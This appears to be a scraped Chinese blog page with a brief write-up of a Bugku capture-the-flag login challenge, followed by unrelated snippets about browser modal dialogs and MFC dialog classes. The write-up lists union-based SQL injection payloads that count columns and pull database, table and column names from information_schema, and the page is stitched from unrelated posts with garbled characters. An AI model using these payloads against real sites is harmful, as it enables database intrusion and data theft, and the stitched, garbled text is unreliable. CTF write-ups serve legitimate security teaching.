這是乙個神奇的對話方塊

2021-09-27 10:28:41 字數 1100 閱讀 9925

輸入0" 發現報錯:

確定可以注入,判斷欄位有多少個 0"order by 1,2,3# 發現:

說明有兩列。

輸入 0" union select database(),2# ,得到庫名:

繼續輸入 0" union select table_name,2 from information_schema.tables where table_schema=』bugkusql1』 # (0" union select group_concat(table_name),2 from information_schema.tables where table_schema=database()# )得到表名:

因為新增的位置主要看回顯位置,故2放在from前面。

1、union兩端查詢的列數要相同但是2放在前面會出現錯誤(0" union select 2, column_name from information_schema.columns where table_name=『flag1』 #)

2、放在後面也會出現錯誤(0" union select column_name from information_schema.columns where table_name=『flag1』,2#)

彈出乙個對話方塊

showmodaldialog 開啟獨佔方式網頁對話方塊 window.showmodaldialog 開啟乙個獨佔方式網頁對話方塊 話法 syntax variant object.showmodaldialog surl varguments sfeatures 引數 描述 surl 指點url...

bugku 這是乙個神奇的登入框

1 開啟題目鏈結,是乙個登入介面,抓包後傳資料進行嘗試 2 嘗試資料 3 判斷回顯位置 admin name 1 union select 1 23 admin passwd 1 submit go go go再改payload為 admin name 1 union select 1,2 23 a...

乙個對話方塊類呼叫(訪問)另乙個對話方塊類的成員變數

mfc中乙個對話方塊類cdailog1要訪問另外乙個對話方塊類cdailog2物件的成員變數,這就需要獲得對話方塊類cdailog2的物件的指標,有好幾種方法可以實現,如維護乙個單例模式 設定靜態變數等。本文設定以靜態變數的方法為例,實現對兩個對話方塊之間資料訪問。一 建立mfc對話方塊程式 1.首...